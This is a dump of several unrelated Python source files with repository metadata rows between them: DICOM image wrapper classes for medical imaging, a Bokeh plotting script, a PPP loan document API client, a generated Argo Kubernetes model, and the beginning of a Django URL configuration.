return np.cross(iop[:, 1], iop[:, 0])
@one_time
def rotation_matrix(self):
""" Return rotation matrix between array indices and mm
Note that we swap the two columns of the 'ImageOrientPatient'
when we create the rotation matrix. This is takes into account
the slightly odd ij transpose construction of the DICOM
orientation fields - see doc/theory/dicom_orientaiton.rst.
"""
iop = self.image_orient_patient
s_norm = self.slice_normal
if None in (iop, s_norm):
return None
R = np.eye(3)
# np.fliplr(iop) gives matrix F in
# doc/theory/dicom_orientation.rst The fliplr accounts for the
# fact that the first column in ``iop`` refers to changes in
# column index, and the second to changes in row index.
R[:, :2] = np.fliplr(iop)
R[:, 2] = s_norm
# check this is in fact a rotation matrix. Error comes from compromise
# motivated in ``doc/source/notebooks/ata_error.ipynb``, and from
# discussion at https://github.com/nipy/nibabel/pull/156
if not np.allclose(np.eye(3), np.dot(R, R.T), atol=5e-5):
raise WrapperPrecisionError('Rotation matrix not nearly orthogonal')
return R
@one_time
def voxel_sizes(self):
""" voxel sizes for array as returned by ``get_data()``
"""
# pix space gives (row_spacing, column_spacing). That is, the
# mm you move when moving from one row to the next, and the mm
# you move when moving from one column to the next
pix_space = self.get('PixelSpacing')
if pix_space is None:
return None
zs = self.get('SpacingBetweenSlices')
if zs is None:
zs = self.get('SliceThickness')
if zs is None:
zs = 1
# Protect from python decimals in pydicom 0.9.7
zs = float(zs)
pix_space = list(map(float, pix_space))
return tuple(pix_space + [zs])
@one_time
def image_position(self):
""" Return position of first voxel in data block
Parameters
----------
None
Returns
-------
img_pos : (3,) array
position in mm of voxel (0,0) in image array
"""
ipp = self.get('ImagePositionPatient')
if ipp is None:
return None
# Values are python Decimals in pydicom 0.9.7
return np.array(list(map(float, ipp)))
@one_time
def slice_indicator(self):
""" A number that is higher for higher slices in Z
Comparing this number between two adjacent slices should give a
difference equal to the voxel size in Z.
See doc/theory/dicom_orientation for description
"""
ipp = self.image_position
s_norm = self.slice_normal
if None in (ipp, s_norm):
return None
return np.inner(ipp, s_norm)
@one_time
def instance_number(self):
""" Just because we use this a lot for sorting """
return self.get('InstanceNumber')
@one_time
def series_signature(self):
""" Signature for matching slices into series
We use `signature` in ``self.is_same_series(other)``.
Returns
-------
signature : dict
with values of 2-element sequences, where first element is
value, and second element is function to compare this value
with another. This allows us to pass things like arrays,
that might need to be ``allclose`` instead of equal
"""
# dictionary with value, comparison func tuple
signature = {}
eq = operator.eq
for key in ('SeriesInstanceUID',
'SeriesNumber',
'ImageType',
'SequenceName',
'EchoNumbers'):
signature[key] = (self.get(key), eq)
signature['image_shape'] = (self.image_shape, eq)
signature['iop'] = (self.image_orient_patient, none_or_close)
signature['vox'] = (self.voxel_sizes, none_or_close)
return signature
def __getitem__(self, key):
""" Return values from DICOM object"""
if not key in self.dcm_data:
raise KeyError('"%s" not in self.dcm_data' % key)
return self.dcm_data.get(key)
def get(self, key, default=None):
""" Get values from underlying dicom data """
return self.dcm_data.get(key, default)
def get_affine(self):
""" Return mapping between voxel and DICOM coordinate system
Parameters
----------
None
Returns
-------
aff : (4,4) affine
Affine giving transformation between voxels in data array and
mm in the DICOM patient coordinate system.
"""
# rotation matrix already accounts for the ij transpose in the
# DICOM image orientation patient transform. So. column 0 is
# direction cosine for changes in row index, column 1 is
# direction cosine for changes in column index
orient = self.rotation_matrix
# therefore, these voxel sizes are in the right order (row,
# column, slice)
vox = self.voxel_sizes
ipp = self.image_position
if None in (orient, vox, ipp):
raise WrapperError('Not enough information for affine')
aff = np.eye(4)
aff[:3, :3] = orient * np.array(vox)
aff[:3, 3] = ipp
return aff
def get_pixel_array(self):
""" Return unscaled pixel array from DICOM """
data = self.dcm_data.get('pixel_array')
if data is None:
raise WrapperError('Cannot find data in DICOM')
return data
def get_data(self):
""" Get scaled image data from DICOMs
We return the data as DICOM understands it, first dimension is
rows, second dimension is columns
Returns
-------
data : array
array with data as scaled from any scaling in the DICOM
fields.
"""
return self._scale_data(self.get_pixel_array())
def is_same_series(self, other):
""" Return True if `other` appears to be in same series
Parameters
----------
other : object
object with ``series_signature`` attribute that is a
mapping. Usually it's a ``Wrapper`` or sub-class instance.
Returns
-------
tf : bool
True if `other` might be in the same series as `self`, False
otherwise.
"""
# compare signature dictionaries. The dictionaries each contain
# comparison rules, we prefer our own when we have them. If a
# key is not present in either dictionary, assume the value is
# None.
my_sig = self.series_signature
your_sig = other.series_signature
my_keys = set(my_sig)
your_keys = set(your_sig)
# we have values in both signatures
for key in my_keys.intersection(your_keys):
v1, func = my_sig[key]
v2, _ = your_sig[key]
if not func(v1, v2):
return False
# values present in one or the other but not both
for keys, sig in ((my_keys - your_keys, my_sig),
(your_keys - my_keys, your_sig)):
for key in keys:
v1, func = sig[key]
if not func(v1, None):
return False
return True
def _scale_data(self, data):
# depending on pydicom and dicom files, values might need casting from Decimal to float
scale = float(self.get('RescaleSlope', 1))
offset = float(self.get('RescaleIntercept', 0))
return self._apply_scale_offset(data, scale, offset)
def _apply_scale_offset(self, data, scale, offset):
# a little optimization. If we are applying either the scale or
# the offset, we need to allow upcasting to float.
if scale != 1:
if offset == 0:
return data * scale
return data * scale + offset
if offset != 0:
return data + offset
return data
@one_time
def b_value(self):
""" Return b value for diffusion or None if not available
"""
q_vec = self.q_vector
if q_vec is None:
return None
return q2bg(q_vec)[0]
@one_time
def b_vector(self):
""" Return b vector for diffusion or None if not available
"""
q_vec = self.q_vector
if q_vec is None:
return None
return q2bg(q_vec)[1]
class MultiframeWrapper(Wrapper):
    """Wrapper for Enhanced MR Storage SOP Class

    Tested with Philips' Enhanced DICOM implementation.

    Attributes
    ----------
    is_multiframe : boolean
        Identifies `dcmdata` as multi-frame
    frames : sequence
        A sequence of ``dicom.dataset.Dataset`` objects populated by the
        ``dicom.dataset.Dataset.PerFrameFunctionalGroupsSequence`` attribute
    shared : object
        The first (and only) ``dicom.dataset.Dataset`` object from a
        ``dicom.dataset.Dataset.SharedFunctionalgroupSequence``.

    Methods
    -------
    image_shape(self)
    image_orient_patient(self)
    voxel_sizes(self)
    image_position(self)
    series_signature(self)
    get_data(self)
    """
    is_multiframe = True
    def __init__(self, dcm_data):
        """Initializes MultiframeWrapper

        Parameters
        ----------
        dcm_data : object
            object should allow 'get' and '__getitem__' access. Usually this
            will be a ``dicom.dataset.Dataset`` object resulting from reading a
            DICOM file, but a dictionary should also work.
        """
        Wrapper.__init__(self, dcm_data)
        self.dcm_data = dcm_data
        # Per-frame functional groups: one Dataset per frame of the file.
        self.frames = dcm_data.get('PerFrameFunctionalGroupsSequence')
        try:
            self.frames[0]
        except TypeError:
            raise WrapperError("PerFrameFunctionalGroupsSequence is empty.")
        try:
            self.shared = dcm_data.get('SharedFunctionalGroupsSequence')[0]
        except TypeError:
            raise WrapperError("SharedFunctionalGroupsSequence is empty.")
        self._shape = None
    @one_time
    def image_shape(self):
        """The array shape as it will be returned by ``get_data()``"""
        rows, cols = self.get('Rows'), self.get('Columns')
        if None in (rows, cols):
            raise WrapperError("Rows and/or Columns are empty.")
        # Check number of frames
        # NOTE(review): this assert disappears under ``python -O``;
        # a WrapperError would be more robust validation.
        n_frames = self.get('NumberOfFrames')
        assert len(self.frames) == n_frames
        # DimensionIndexValues: per-frame multi-dimensional index
        # (stack id first, then the remaining dimension indices).
        frame_indices = np.array(
            [frame.FrameContentSequence[0].DimensionIndexValues
             for frame in self.frames])
        n_dim = frame_indices.shape[1] + 1
        # Check there is only one multiframe stack index
        if np.any(np.diff(frame_indices[:, 0])):
            raise WrapperError("File contains more than one StackID. Cannot handle multi-stack files")
        # Store frame indices (minus the stack id) for sorting in get_data
        self._frame_indices = frame_indices[:, 1:]
        if n_dim < 4:  # 3D volume
            return rows, cols, n_frames
        # More than 3 dimensions
        ns_unique = [len(np.unique(row)) for row in self._frame_indices.T]
        shape = (rows, cols) + tuple(ns_unique)
        n_vols = np.prod(shape[3:])
        # Sanity check: frames must tile the >3D shape exactly
        if n_frames != n_vols * shape[2]:
            raise WrapperError("Calculated shape does not match number of frames.")
        return tuple(shape)
    @one_time
    def image_orient_patient(self):
        """
        Note that this is _not_ LR flipped
        """
        # Prefer the shared functional group; fall back to the first frame.
        try:
            iop = self.shared.PlaneOrientationSequence[0].ImageOrientationPatient
        except AttributeError:
            try:
                iop = self.frames[0].PlaneOrientationSequence[0].ImageOrientationPatient
            except AttributeError:
                raise WrapperError("Not enough information for image_orient_patient")
        if iop is None:
            return None
        # Values may be python Decimals; force plain floats
        iop = np.array(list(map(float, iop)))
        return np.array(iop).reshape(2, 3).T
    @one_time
    def voxel_sizes(self):
        ''' Get i, j, k voxel sizes '''
        # Prefer the shared functional group; fall back to the first frame.
        try:
            pix_measures = self.shared.PixelMeasuresSequence[0]
        except AttributeError:
            try:
                pix_measures = self.frames[0].PixelMeasuresSequence[0]
            except AttributeError:
                raise WrapperError("Not enough data for pixel spacing")
        pix_space = pix_measures.PixelSpacing
        try:
            zs = pix_measures.SliceThickness
        except AttributeError:
            zs = self.get('SpacingBetweenSlices')
            if zs is None:
                raise WrapperError('Not enough data for slice thickness')
        # Ensure values are float rather than Decimal
        return tuple(map(float, list(pix_space) + [zs]))
    @one_time
    def image_position(self):
        # Prefer the shared functional group; fall back to the first frame.
        try:
            ipp = self.shared.PlanePositionSequence[0].ImagePositionPatient
        except AttributeError:
            try:
                ipp = self.frames[0].PlanePositionSequence[0].ImagePositionPatient
            except AttributeError:
                raise WrapperError('Cannot get image position from dicom')
        if ipp is None:
            return None
        return np.array(list(map(float, ipp)))
    @one_time
    def series_signature(self):
        # Same structure as Wrapper.series_signature, with the subset of
        # keys that are meaningful for multiframe files.
        signature = {}
        eq = operator.eq
        for key in ('SeriesInstanceUID',
                    'SeriesNumber',
                    'ImageType'):
            signature[key] = (self.get(key), eq)
        signature['image_shape'] = (self.image_shape, eq)
        signature['iop'] = (self.image_orient_patient, none_or_close)
        signature['vox'] = (self.voxel_sizes, none_or_close)
        return signature
    def get_data(self):
        """Return scaled image data reshaped from the frame stack."""
        shape = self.image_shape
        if shape is None:
            raise WrapperError('No valid information for image shape')
        data = self.get_pixel_array()
        # Roll frames axis to last
        data = data.transpose((1, 2, 0))
        # Sort frames with first index changing fastest, last slowest
        sorted_indices = np.lexsort(self._frame_indices.T)
        data = data[..., sorted_indices]
        data = data.reshape(shape, order='F')
        return self._scale_data(data)
    def _scale_data(self, data):
        # Multiframe files carry scaling in a per-frame
        # PixelValueTransformationSequence; fall back to the top-level
        # RescaleSlope/Intercept handling when it is absent.
        pix_trans = getattr(
            self.frames[0], 'PixelValueTransformationSequence', None)
        if pix_trans is None:
            return super(MultiframeWrapper, self)._scale_data(data)
        scale = float(pix_trans[0].RescaleSlope)
        offset = float(pix_trans[0].RescaleIntercept)
        return self._apply_scale_offset(data, scale, offset)
class SiemensWrapper(Wrapper):
    """ Wrapper for Siemens format DICOMs

    Adds attributes:

    * csa_header : mapping
    * b_matrix : (3,3) array
    * q_vector : (3,) array
    """
    is_csa = True

    def __init__(self, dcm_data, csa_header=None):
        """ Initialize Siemens wrapper

        The Siemens-specific information is in the `csa_header`, either
        passed in here, or read from the input `dcm_data`.

        Parameters
        ----------
        dcm_data : object
            object should allow 'get' and '__getitem__' access. If `csa_header`
            is None, it should also be possible to extract a CSA header from
            `dcm_data`. Usually this will be a ``dicom.dataset.Dataset`` object
            resulting from reading a DICOM file. A dict should also work.
        csa_header : None or mapping, optional
            mapping giving values for Siemens CSA image sub-header.  If
            None, we try and read the CSA information from `dcm_data`.
            If this fails, we fall back to an empty dict.
        """
        super(SiemensWrapper, self).__init__(dcm_data)
        if dcm_data is None:
            dcm_data = {}
        self.dcm_data = dcm_data
        if csa_header is None:
            csa_header = csar.get_csa_header(dcm_data)
            if csa_header is None:
                # Fall back to an empty mapping so attribute access below
                # degrades gracefully for non-Siemens data.
                csa_header = {}
        self.csa_header = csa_header

    @one_time
    def slice_normal(self):
        # The std_slice_normal comes from the cross product of the directions
        # in the ImageOrientationPatient
        std_slice_normal = super(SiemensWrapper, self).slice_normal
        csa_slice_normal = csar.get_slice_normal(self.csa_header)
        if std_slice_normal is None and csa_slice_normal is None:
            return None
        elif std_slice_normal is None:
            return np.array(csa_slice_normal)
        elif csa_slice_normal is None:
            return std_slice_normal
        else:
            # Make sure the two normals are very close to parallel unit vectors
            dot_prod = np.dot(csa_slice_normal, std_slice_normal)
            assert np.allclose(np.fabs(dot_prod), 1.0, atol=1e-5)
            # Use the slice normal computed with the cross product as it will
            # always be the most orthogonal, but take the sign from the CSA
            # slice normal
            if dot_prod < 0:
                return -std_slice_normal
            else:
                return std_slice_normal

    @one_time
    def series_signature(self):
        """ Add ICE dims from CSA header to signature """
        signature = super(SiemensWrapper, self).series_signature
        ice = csar.get_ice_dims(self.csa_header)
        # Idiomatic form of the original ``not ice is None``
        if ice is not None:
            # Drop dimensions 7-8 (1-based), which vary within a series
            ice = ice[:6] + ice[8:9]
        signature['ICE_Dims'] = (ice, lambda x, y: x == y)
        return signature

    @one_time
    def b_matrix(self):
        """ Get DWI B matrix referring to voxel space

        Parameters
        ----------
        None

        Returns
        -------
        B : (3,3) array or None
            B matrix in *voxel* orientation space.  Returns None if this is
            not a Siemens header with the required information.  We return
            None if this is a b0 acquisition
        """
        hdr = self.csa_header
        # read B matrix as recorded in CSA header.  This matrix refers to
        # the space of the DICOM patient coordinate space.
        B = csar.get_b_matrix(hdr)
        if B is None:  # may be not diffusion or B0 image
            bval_requested = csar.get_b_value(hdr)
            if bval_requested is None:
                return None
            if bval_requested != 0:
                raise csar.CSAError('No B matrix and b value != 0')
            return np.zeros((3, 3))
        # rotation from voxels to DICOM PCS, inverted to give the rotation
        # from DPCS to voxels.  Because this is an orthonormal matrix, its
        # transpose is its inverse
        R = self.rotation_matrix.T
        # because B results from V dot V.T, the rotation B is given by R dot
        # V dot V.T dot R.T == R dot B dot R.T
        B_vox = np.dot(R, np.dot(B, R.T))
        # fix presumed rounding errors in the B matrix by making it positive
        # semi-definite.
        return nearest_pos_semi_def(B_vox)

    @one_time
    def q_vector(self):
        """ Get DWI q vector referring to voxel space

        Parameters
        ----------
        None

        Returns
        -------
        q: (3,) array
            Estimated DWI q vector in *voxel* orientation space.  Returns
            None if this is not (detectably) a DWI
        """
        B = self.b_matrix
        if B is None:
            return None
        # We've enforced more or less positive semi definite with the
        # b_matrix routine
        return B2q(B, tol=1e-8)
class MosaicWrapper(SiemensWrapper):
    """ Class for Siemens mosaic format data

    Mosaic format is a way of storing a 3D image in a 2D slice - and
    it's as simple as you'd imagine it would be - just storing the slices
    in a mosaic similar to a light-box print.

    We need to allow for this when getting the data and (because of an
    idiosyncrasy in the way Siemens stores the images) calculating the
    position of the first voxel.

    Adds attributes:

    * n_mosaic : int
    * mosaic_size : float
    """
    is_mosaic = True

    def __init__(self, dcm_data, csa_header=None, n_mosaic=None):
        """ Initialize Siemens Mosaic wrapper

        The Siemens-specific information is in the `csa_header`, either
        passed in here, or read from the input `dcm_data`.

        Parameters
        ----------
        dcm_data : object
            object should allow 'get' and '__getitem__' access. If `csa_header`
            is None, it should also be possible to extract a CSA header from
            `dcm_data`. Usually this will be a ``dicom.dataset.Dataset`` object
            resulting from reading a DICOM file. A dict should also work.
        csa_header : None or mapping, optional
            mapping giving values for Siemens CSA image sub-header.
        n_mosaic : None or int, optional
            number of images in mosaic.  If None, try to get this number
            from `csa_header`.  If this fails, raise an error
        """
        SiemensWrapper.__init__(self, dcm_data, csa_header)
        if n_mosaic is None:
            # Best effort read from the CSA header; the explicit check below
            # raises if we still have no usable mosaic count.
            try:
                n_mosaic = csar.get_n_mosaic(self.csa_header)
            except KeyError:
                pass
            if n_mosaic is None or n_mosaic == 0:
                raise WrapperError('No valid mosaic number in CSA '
                                   'header; is this really '
                                   'Siemens mosaic data?')
        self.n_mosaic = n_mosaic
        # Number of tiles along each side of the (square) mosaic grid
        self.mosaic_size = np.ceil(np.sqrt(n_mosaic))

    @one_time
    def image_shape(self):
        """ Return image shape as returned by ``get_data()`` """
        # reshape pixel slice array back from mosaic
        rows = self.get('Rows')
        cols = self.get('Columns')
        if None in (rows, cols):
            return None
        mosaic_size = self.mosaic_size
        return (int(rows / mosaic_size),
                int(cols / mosaic_size),
                self.n_mosaic)

    @one_time
    def image_position(self):
        """ Return position of first voxel in data block

        Adjusts Siemens mosaic position vector for bug in mosaic format
        position.  See ``dicom_mosaic`` in doc/theory for details.

        Parameters
        ----------
        None

        Returns
        -------
        img_pos : (3,) array
            position in mm of voxel (0,0,0) in Mosaic array
        """
        ipp = super(MosaicWrapper, self).image_position
        # mosaic image size
        md_rows, md_cols = (self.get('Rows'), self.get('Columns'))
        iop = self.image_orient_patient
        pix_spacing = self.get('PixelSpacing')
        # Explicit ``is None`` tests.  ``ipp`` and ``iop`` are numpy arrays,
        # so ``None in (...)`` would compare them elementwise (modern numpy)
        # and raise on their ambiguous truth value.
        if (ipp is None or md_rows is None or md_cols is None or
                iop is None or pix_spacing is None):
            return None
        # PixelSpacing values are python Decimal in pydicom 0.9.7
        pix_spacing = np.array(list(map(float, pix_spacing)))
        # size of mosaic array before rearranging to 3D.
        md_rc = np.array([md_rows, md_cols])
        # size of slice array after reshaping to 3D
        rd_rc = md_rc / self.mosaic_size
        # apply algorithm for undoing mosaic translation error - see
        # ``dicom_mosaic`` doc
        vox_trans_fixes = (md_rc - rd_rc) / 2
        # flip IOP field to refer to rows then columns index change -
        # see dicom_orientation doc
        Q = np.fliplr(iop) * pix_spacing
        return ipp + np.dot(Q, vox_trans_fixes[:, None]).ravel()

    def get_data(self):
        """ Get scaled image data from DICOMs

        Resorts data block from mosaic to 3D

        Returns
        -------
        data : array
            array with data as scaled from any scaling in the DICOM
            fields.

        Notes
        -----
        The apparent image in the DICOM file is a 2D array that consists of
        blocks, that are the output 2D slices.  Let's call the original array
        the *slab*, and the contained slices *slices*.   The slices are of
        pixel dimension ``n_slice_rows`` x ``n_slice_cols``.  The slab is of
        pixel dimension ``n_slab_rows`` x ``n_slab_cols``.  Because the
        arrangement of blocks in the slab is defined as being square, the
        number of blocks per slab row and slab column is the same.  Let
        ``n_blocks`` be the number of blocks contained in the slab.  There is
        also ``n_slices`` - the number of slices actually collected, some
        number <= ``n_blocks``.  We have the value ``n_slices`` from the
        'NumberOfImagesInMosaic' field of the Siemens private (CSA) header.
        ``n_row_blocks`` and ``n_col_blocks`` are therefore given by
        ``ceil(sqrt(n_slices))``, and ``n_blocks`` is ``n_row_blocks ** 2``.
        Also ``n_slice_rows == n_slab_rows / n_row_blocks``, etc.  Using these
        numbers we can therefore reconstruct the slices from the 2D DICOM
        pixel array.
        """
        shape = self.image_shape
        if shape is None:
            raise WrapperError('No valid information for image shape')
        n_slice_rows, n_slice_cols, n_mosaic = shape
        # ``mosaic_size`` comes from ``np.ceil`` and is therefore a float;
        # ``reshape`` requires integer dimensions (floats raise in modern
        # numpy), so cast here.
        n_slab_rows = int(self.mosaic_size)
        n_blocks = n_slab_rows ** 2
        data = self.get_pixel_array()
        v4 = data.reshape(n_slab_rows, n_slice_rows,
                          n_slab_rows, n_slice_cols)
        # move the mosaic dims to the end
        v4 = v4.transpose((1, 3, 0, 2))
        # pool mosaic-generated dims
        v3 = v4.reshape((n_slice_rows, n_slice_cols, n_blocks))
        # delete any padding slices
        v3 = v3[..., :n_mosaic]
        return self._scale_data(v3)
def none_or_close(val1, val2, rtol=1e-5, atol=1e-6):
    """ Match if `val1` and `val2` are both None, or are close

    Parameters
    ----------
    val1 : None or array-like
    val2 : None or array-like
    rtol : float, optional
        Relative tolerance; see ``np.allclose``
    atol : float, optional
        Absolute tolerance; see ``np.allclose``

    Returns
    -------
    tf : bool
        True iff (both `val1` and `val2` are None) or (`val1` and `val2`
        are close arrays, as detected by ``np.allclose`` with parameters
        `rtol` and `atol`).

    Examples
    --------
    >>> none_or_close(None, None)
    True
    >>> none_or_close(1, None)
    False
    >>> none_or_close(None, 1)
    False
    >>> none_or_close([1,2], [1,2])
    True
    >>> none_or_close([0,1], [0,2])
    False
    """
    # Explicit ``is None`` tests.  The previous tuple-based tests
    # (``(val1, val2) == (None, None)`` and ``None in (val1, val2)``)
    # apply ``==`` to the values; for numpy arrays that comparison is
    # elementwise and the resulting array's truth value raises ValueError.
    if val1 is None and val2 is None:
        return True
    if val1 is None or val2 is None:
        return False
    return np.allclose(val1, val2, rtol, atol)
| [
"lichenliang@Lichens-MacBook-Air.local"
] | lichenliang@Lichens-MacBook-Air.local |
90af3f4c9e051e9b5c8261ceac9771dd3b23fc42 | d7b83b50027c34bdbd0b2bad3a8b3d0937dc9229 | /bokeh_project/bokeh_display_export.py | 488179c36e51395f42338d7a5da5239e9b0125d6 | [] | no_license | 6oghyan/data_science_for_everyone | be1468f236708a9384f40e6f8fbf5f97db905c6b | 3065e8e4c1112913493958687d0af99301a1773d | refs/heads/main | 2023-08-30T11:08:04.728007 | 2021-11-03T18:34:39 | 2021-11-03T18:34:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | from bokeh.plotting import figure, output_file, save
from bokeh.io import export_svg
# Sample data: x runs 0..10 and y is the distance from 10 (descending ramp).
x = list(range(11))
y = [abs(10 - i) for i in x]
# output to static HTML file
# NOTE(review): ``output_file``/``figure`` come from the ``bokeh.plotting``
# import at the top of the file; ``save`` is imported there but never called,
# so the HTML file named here is registered but not written by this script.
output_file(filename="HERE IS MY NEW FILE.html", title="HTML FILE")
# Responsive figure capped at 500x250 pixels
p = figure(sizing_mode="stretch_width", max_width=500, max_height=250)
p.circle(x, y, fill_color="blue", size=10)
# Write the plot out as an SVG file (requires a headless browser driver)
export_svg(p, filename="ANOTHER PLOT.svg")
"markumreed@gmail.com"
] | markumreed@gmail.com |
60880a65d205b0aa41d8738ea420c2ebfb5ebad8 | 84b584038550cb75f1863574ae646c2a287a3fcc | /PPPForgivenessSDK/loan_documents.py | f6643aaa32f1ce5e24ee3b891ed91b70c810dbf6 | [] | no_license | rsmith0717/lc-coding-challenge | 5a07171920a3b24d4d847f58dc9ede89154857c3 | de308fe72d6c8705a90cdfca9c03e009e70846f1 | refs/heads/master | 2023-03-02T12:51:33.726056 | 2021-02-15T18:28:27 | 2021-02-15T18:28:27 | 339,170,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 935 | py | import json
from .base_api import BaseApi, UnknownException
class LoanDocumentsApi(BaseApi):
def create(self, name, document_type, etran_loan, document):
"""
:param name:
:param document_type:
:param etran_loan:
:param document:
:return:
"""
http_method = "POST"
endpoint = "ppp_loan_documents/"
uri = self.client.api_uri + endpoint
params = {'name': name, 'document_type': document_type, 'etran_loan': etran_loan}
files = {'document': open(document, 'rb')}
try:
response = self.execute(http_method=http_method,
url=uri,
data=params,
files=files)
return {'status': response.status_code,
'data': json.loads(response.text)}
except:
raise UnknownException | [
"rodericks@ineedamaid.com"
] | rodericks@ineedamaid.com |
e5c52f925a0fab9388230c7329c217af4f1a1907 | 8b8fa2f20a33b4c6f02f0138f8f77d578e927fd2 | /argo/workflows/client/models/v1_pod_affinity_term.py | 9030434dfd3d44163e50d3eda6f1981b88d6a291 | [
"Apache-2.0",
"MIT"
] | permissive | jakedsouza/argo-client-python | 1fa3c8489d961090f6ee3604befb9b695ac8c91b | 12e3159b297ed16479adf67c5e5daffab6e83897 | refs/heads/master | 2023-01-21T14:06:04.115524 | 2020-11-28T22:48:26 | 2020-11-28T22:48:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,260 | py | # coding: utf-8
"""
Argo Server API
You can get examples of requests and responses by using the CLI with `--gloglevel=9`, e.g. `argo list --gloglevel=9` # noqa: E501
The version of the OpenAPI document: v2.11.8
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from argo.workflows.client.configuration import Configuration
class V1PodAffinityTerm(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Declared attribute types used by to_dict()/deserialization machinery
    openapi_types = {
        'label_selector': 'V1LabelSelector',
        'namespaces': 'list[str]',
        'topology_key': 'str'
    }
    # Python attribute name -> JSON field name mapping
    attribute_map = {
        'label_selector': 'labelSelector',
        'namespaces': 'namespaces',
        'topology_key': 'topologyKey'
    }
    def __init__(self, label_selector=None, namespaces=None, topology_key=None, local_vars_configuration=None):  # noqa: E501
        """V1PodAffinityTerm - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration
        self._label_selector = None
        self._namespaces = None
        self._topology_key = None
        self.discriminator = None
        if label_selector is not None:
            self.label_selector = label_selector
        if namespaces is not None:
            self.namespaces = namespaces
        # topology_key is required; assigning through the property validates it
        self.topology_key = topology_key
    @property
    def label_selector(self):
        """Gets the label_selector of this V1PodAffinityTerm.  # noqa: E501

        :return: The label_selector of this V1PodAffinityTerm.  # noqa: E501
        :rtype: V1LabelSelector
        """
        return self._label_selector
    @label_selector.setter
    def label_selector(self, label_selector):
        """Sets the label_selector of this V1PodAffinityTerm.

        :param label_selector: The label_selector of this V1PodAffinityTerm.  # noqa: E501
        :type: V1LabelSelector
        """
        self._label_selector = label_selector
    @property
    def namespaces(self):
        """Gets the namespaces of this V1PodAffinityTerm.  # noqa: E501

        namespaces specifies which namespaces the labelSelector applies to (matches against); null or empty list means \"this pod's namespace\"  # noqa: E501

        :return: The namespaces of this V1PodAffinityTerm.  # noqa: E501
        :rtype: list[str]
        """
        return self._namespaces
    @namespaces.setter
    def namespaces(self, namespaces):
        """Sets the namespaces of this V1PodAffinityTerm.

        namespaces specifies which namespaces the labelSelector applies to (matches against); null or empty list means \"this pod's namespace\"  # noqa: E501

        :param namespaces: The namespaces of this V1PodAffinityTerm.  # noqa: E501
        :type: list[str]
        """
        self._namespaces = namespaces
    @property
    def topology_key(self):
        """Gets the topology_key of this V1PodAffinityTerm.  # noqa: E501

        This pod should be co-located (affinity) or not co-located (anti-affinity) with the pods matching the labelSelector in the specified namespaces, where co-located is defined as running on a node whose value of the label with key topologyKey matches that of any node on which any of the selected pods is running. Empty topologyKey is not allowed.  # noqa: E501

        :return: The topology_key of this V1PodAffinityTerm.  # noqa: E501
        :rtype: str
        """
        return self._topology_key
    @topology_key.setter
    def topology_key(self, topology_key):
        """Sets the topology_key of this V1PodAffinityTerm.

        This pod should be co-located (affinity) or not co-located (anti-affinity) with the pods matching the labelSelector in the specified namespaces, where co-located is defined as running on a node whose value of the label with key topologyKey matches that of any node on which any of the selected pods is running. Empty topologyKey is not allowed.  # noqa: E501

        :param topology_key: The topology_key of this V1PodAffinityTerm.  # noqa: E501
        :type: str
        """
        # Required field: reject None when client-side validation is enabled
        if self.local_vars_configuration.client_side_validation and topology_key is None:  # noqa: E501
            raise ValueError("Invalid value for `topology_key`, must not be `None`")  # noqa: E501
        self._topology_key = topology_key
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively serialize nested models, lists and dicts of models
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, V1PodAffinityTerm):
            return False
        return self.to_dict() == other.to_dict()
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, V1PodAffinityTerm):
            return True
        return self.to_dict() != other.to_dict()
| [
"noreply@github.com"
] | jakedsouza.noreply@github.com |
43a1bcb706a6017d2eb7a5ce6899634284cba09e | e36c1798a2089a7a0a2a59a394ed8a025db8358b | /synbyt/urls.py | d8e21808edc495eaec82e093b6806bf32cf61bef | [] | no_license | actstylo/synbyt2 | d81286689051a02b34abd4890332e37f28b83b43 | d891a4d1bc460a08157f7bfd6c44ab5d716ed726 | refs/heads/master | 2020-03-17T03:11:02.908786 | 2018-05-13T09:42:35 | 2018-05-13T09:42:35 | 133,224,086 | 1 | 0 | null | 2018-05-13T09:46:05 | 2018-05-13T09:46:04 | null | UTF-8 | Python | false | false | 2,382 | py | from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.conf.urls.static import static
from django.contrib.auth import views as auth_views
from synbytapp import views
from accounts import views as accounts_views
from django.conf.urls import (
handler400, handler403, handler404, handler500
)
# Override Django's default error handlers with the project's custom views.
handler400 = 'synbytapp.views.bad_request'
handler403 = 'synbytapp.views.permission_denied'
handler404 = 'synbytapp.views.page_not_found'
handler500 = 'synbytapp.views.server_error'
# URL routes: static pages, account flows, and the full password
# reset/change cycle built on Django's class-based auth views.
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^$', views.home, name='home'),
    url(r'^about/$', views.about, name='about'),
    url(r'^support/$', views.support, name='support'),
    url(r'^terms/$', views.terms_of_use, name='terms_of_use'),
    url(r'^contact/$', accounts_views.contact, name='contact'),
    url(r'^success/$', accounts_views.successView, name='success'),
    url(r'^login/$', auth_views.LoginView.as_view(template_name='login.html'), name='login'),
    url(r'^signup/$', accounts_views.signup, name='signup'),
    url(r'^logout/$', auth_views.LogoutView.as_view(), name='logout'),
